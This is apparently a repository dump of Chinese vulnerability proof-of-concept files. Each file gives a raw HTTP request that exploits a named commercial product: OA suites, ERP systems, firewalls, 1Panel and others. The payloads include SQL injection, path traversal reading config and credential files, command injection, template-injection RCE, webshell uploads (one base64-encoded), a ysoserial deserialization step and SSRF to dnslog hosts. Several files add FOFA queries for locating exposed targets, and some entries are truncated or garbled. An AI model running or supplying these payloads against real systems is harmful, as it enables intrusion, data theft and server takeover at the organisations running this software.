/HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 5 | ``` 6 | 7 | -------------------------------------------------------------------------------- /用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /kp/PrintZP.jsp?zpfbbh=1%27+IF(LEN(db_name())>4)+WAITFOR+DELAY+%270:0:2%27+--+ HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 5 | Connection: close 6 | ``` 7 | 8 | -------------------------------------------------------------------------------- /用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /kp/fillKP.jsp?kp_djbh=1%27+IF(LEN(db_name())>4)+WAITFOR%20DELAY%20%270:0:2%27+--+ HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 5 | Connection: close 6 | ``` 7 | 8 | -------------------------------------------------------------------------------- /用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | GET /kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13,14+--+ HTTP/1.1 4 | Host: 5 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 6 | Connec 7 | ``` 8 | 9 | -------------------------------------------------------------------------------- /安恒-下一代防火墙-RCE.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%60id+%3E/usr/local/webui/frrgkquigh.txt%60 HTTP/1.1 3 | Host: 
xx.xx.xx.xx:9099 4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 5 | ``` 6 | 7 | -------------------------------------------------------------------------------- /用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /kp/PrintZPZP.jsp?zpshqid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13+--+ HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 5 | Connection: close 6 | ``` 7 | 8 | -------------------------------------------------------------------------------- /金和OA任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1 3 | Host: 127.0.0.1 4 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) 5 | Accept: */* 6 | Connection: Keep-Alive 7 | ``` 8 | 9 | -------------------------------------------------------------------------------- /宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | POST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1 3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 4 | Accept-Encoding: gzip, deflate 5 | 6 | filePath=c:\windows\win.ini 7 | ``` 8 | 9 | -------------------------------------------------------------------------------- /panabit日志审计系统sprog_upstatus存在SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1 3 | User-Agent: Mozilla/4.0 (compatible; MSIE 
8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Host:
```

--------------------------------------------------------------------------------
/喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /logistics/home_warning/php/not_out_depot.php?do=getList&lsid= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
```

--------------------------------------------------------------------------------
/致远AnalyticsCloud 分析云存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

--------------------------------------------------------------------------------
/Tenda FH1201 v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473).md:
--------------------------------------------------------------------------------
```
import requests

ip = '192.168.74.145'

url = "http://" + ip + "/goform/WriteFacMac"
payload = ";echo 'hacker!'"

data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)
```

--------------------------------------------------------------------------------
/宏脉医疗DownLoadServerFile任意文件读取下载漏洞.md:
--------------------------------------------------------------------------------
```
P0ST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate

filePath=c:\windows\win.in
```

--------------------------------------------------------------------------------
/华天动力-OA-downloadWpsFile任意文件读取.md:
--------------------------------------------------------------------------------
```
GET /OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml HTTP/2
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
```

--------------------------------------------------------------------------------
/证书查询系统存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
```

--------------------------------------------------------------------------------
/通天星 CMSV6 车载视频监控平台 disable 存在 SQL 注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+ 2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
```

--------------------------------------------------------------------------------
/福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /app/ext/ajax_users.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) 
Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
```

--------------------------------------------------------------------------------
/1Panel 远程代码执行漏洞(XVE-2024-17699).md:
--------------------------------------------------------------------------------
```

GET /.git/config HTTP/1.1
Host:
User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE
test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES (''+>+lol.php)&type=pdf HTTP/1.1
Host: 192.168.15.5
Content-Length: 21
User-Agent: ToxicPotato
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

fogguiuser=fog&nojson=2
```

--------------------------------------------------------------------------------
/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014).md:
--------------------------------------------------------------------------------
```
GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Host:
```

--------------------------------------------------------------------------------
/金万维云联应用系统接入平台RCE.md:
--------------------------------------------------------------------------------
```

GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞.md:
--------------------------------------------------------------------------------
```
GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=%60echo%20test%3Etest.txt%60 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

--------------------------------------------------------------------------------
/科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞.md:
--------------------------------------------------------------------------------
```

GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
```

--------------------------------------------------------------------------------
/金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞.md:
--------------------------------------------------------------------------------
```
GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; 
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/用友 U8 cloud MonitorServlet 反序列化漏洞.md:
--------------------------------------------------------------------------------
```
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser


POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

payload
```

--------------------------------------------------------------------------------
/科讯校园一卡通管理系统 dormitoryHealthRankingSQL注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/天玥网络安全审计系统 SQL 注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close

checkname=123&tagid=123 AND 8475=(SELECT 8475 FROM PG_SLEEP(5))-- BAUh
```

--------------------------------------------------------------------------------
/天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml
```

--------------------------------------------------------------------------------
/竹云 信息泄露.md:
--------------------------------------------------------------------------------
```
POST /admin-api/oauth/../admin/user/findlist
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection:close
{"pagesize":改个数,"pageNumber":改个数,"userName":""}
```

--------------------------------------------------------------------------------
/天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
GET /HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/数字通云平台智慧政务 time SQL注入漏洞.md:
--------------------------------------------------------------------------------
```

GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

--------------------------------------------------------------------------------
/SuiteCRM responseEntryPoint存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```

--------------------------------------------------------------------------------
/泛微E-Mobile installOperate.do SSRF漏洞.md:
--------------------------------------------------------------------------------
FOFA:

```
product="泛微-EMobile" || header="EMobileServer"
```

```
GET /install/installOperate.do?svrurl=http://test.emobile.dnslog.cn HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close
```

--------------------------------------------------------------------------------
/1Panel面板最新前台RCE漏洞.md:
--------------------------------------------------------------------------------
```
GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('');#
```

--------------------------------------------------------------------------------
/方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/json

{clmID:"1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QurA"}
```

--------------------------------------------------------------------------------
/金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded

moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
```

--------------------------------------------------------------------------------
/通达OA V11.10 login.php SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /ispirit/interface/login.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; IntelMacOSX10_12_6)AppleWebKit/537.36(KHTML, like 
Gecko)Chrome/69.0.855.2 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1%3d0,1,(select+~0%2b1))+limit+0,1))--+'
```

--------------------------------------------------------------------------------
/西软云XMS-futurehoteloperate接口存在XXE漏洞.md:
--------------------------------------------------------------------------------
```
POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
Connection: close
Content-Type: text/xml
Accept-Encoding: gzip

%remote;]>
```

--------------------------------------------------------------------------------
/金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1WAITFOR+DELAY+%270:0:6%27--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Cookie: ASP.NET_SessionId=0uha1u0nhrn4meghddjiwu0y
Accept-Encoding: gzip
```

--------------------------------------------------------------------------------
/亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞.md:
--------------------------------------------------------------------------------
```
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded

command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
```

```
body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp" || body="/CDGServer3/index.jsp"
```

--------------------------------------------------------------------------------
/ServiceNowUI Macros CVE-2024-4879 模板注入漏洞.md:
--------------------------------------------------------------------------------
icon_hash="1701804003" || title="servicenow"

```
GET /login.do?jvar_page_title= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
```

--------------------------------------------------------------------------------
/用友-U8-Cloud-文件上传.md:
--------------------------------------------------------------------------------
FOFA:app="用友-U8-Cloud"

```
POST /linux/pages/upload.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
filename: rce.jsp

<% out.println("Hello,U8C");%>
```

http://your-ip/linux/上传文件名.jsp

--------------------------------------------------------------------------------
/魔方网表 mailupdate.jsp 接口 任意文件上传.md:
--------------------------------------------------------------------------------
```

GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test1.jsp&messagecontent=%3C%25+out.println%28%22tteesstt1%22%29%3B%25%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: /
Host:
Connection: close
```

```
/magicflu/test1.jsp
```

--------------------------------------------------------------------------------
/华磊科技物流modifyInsurance sql注入漏洞.md:
--------------------------------------------------------------------------------
```
GET 
/modifyInsurance.htm?documentCode=1&insuranceValue=1&customerId=1+AND+6269=(SELECT+6269+FROM+PG_SLEEP(5)) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
```

--------------------------------------------------------------------------------
/用友U8 Cloud ActionServlet SQL注入漏洞.md:
--------------------------------------------------------------------------------
```

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
```

--------------------------------------------------------------------------------
/汇智ERP filehandle.aspx 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
fofa

```

icon_hash="-642591392"
```

POC

```

GET /nssys/common/filehandle.aspx?filepath=C%3a%2fwindows%2fwin%2eini HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

--------------------------------------------------------------------------------
/Quicklancer存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
GET 
/listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1&salary-type=1&sort=id&subcat= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


python3 sqlmap.py -r test.txt -p range2 --dbms=mysql --current-db --current-user --batch
```

--------------------------------------------------------------------------------
/万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md:
--------------------------------------------------------------------------------
```
POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0

DBSTEP V3.0 145 0 105 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE=Ly8uLi8uLi9wdWJsaWMvZWRpdC83Yzc1QWYuanNw
<% out.println("5EA635");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
```

--------------------------------------------------------------------------------
/广联达-Linkworks-GetAllData接口存在未授权访问.md:
--------------------------------------------------------------------------------
```
POST /WebService/Lk6SyncService/MrMMSSvc/DataSvc.asmx/GetAllData HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-P585Y) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Content-Length: 32
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

Token=!@#$asdf$#@!&DataType=user
```

--------------------------------------------------------------------------------
/用友NC Cloud queryStaffByName SQL注入漏洞.md:
--------------------------------------------------------------------------------
fofa

product="用友-NC-Cloud"

```
GET 
/ncchr/pm/staff/queryStaffByName?name=1%27%20AND%201=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--+ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Connection: close
```

--------------------------------------------------------------------------------
/联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
```

--------------------------------------------------------------------------------
/JeecgBoot积木报表存在SQL注入.md:
--------------------------------------------------------------------------------
```
POST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123123 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/json
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.131.100:8088
Content-Length: 21

{"sql":"select '1' "}
```

--------------------------------------------------------------------------------
/泛微e-cology9 存在SSRF漏洞.md:
--------------------------------------------------------------------------------
```
POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Upgrade-Insecure-Requests: 1

{
"file_id": "1000",
"file_name": "c",
"download_url":"http://euixlkewfg.dgrh3.cn"
}
```

--------------------------------------------------------------------------------
/赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```

GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0)Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close

```

--------------------------------------------------------------------------------
/华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md:
--------------------------------------------------------------------------------
```

GET /getOrderTrackingNumber.htm?documentCode=1'and%0a1=user::integer-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
```

--------------------------------------------------------------------------------
/致远constDef接囗存在代码执行漏洞.md:
--------------------------------------------------------------------------------
```
GET 
/seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22PCUKaWYocmVxdWVzdC5nZXRQYXJhbWV0ZXlolmYiKSE9bnVsbCkobmV3lGphdmEuaW8uRmlsZU91dHB1dFN0cmVhbShhcHBsaWNhdGlvbi5nZXRSZWFSUGF0aCgiXFwiKStyZXF1ZXN0LmdldFBhcmFtZXRlcigiZilpKSkud3JpdGUocmVxdWVzdC5nZXRQYXJhbWV0ZXlolnQiKs5n
ZXRCeXRIcygpKTSKJT4=%22));%22&constDescription=123&constType=4 HTTP/1.1
Host: {{Hostname}}
```

--------------------------------------------------------------------------------
/aiohttp存在目录遍历漏洞(CVE-2024-23334).md:
--------------------------------------------------------------------------------
```
GET /static/../../../../../../etc/passwd HTTP/1.1
Host: xxxxx
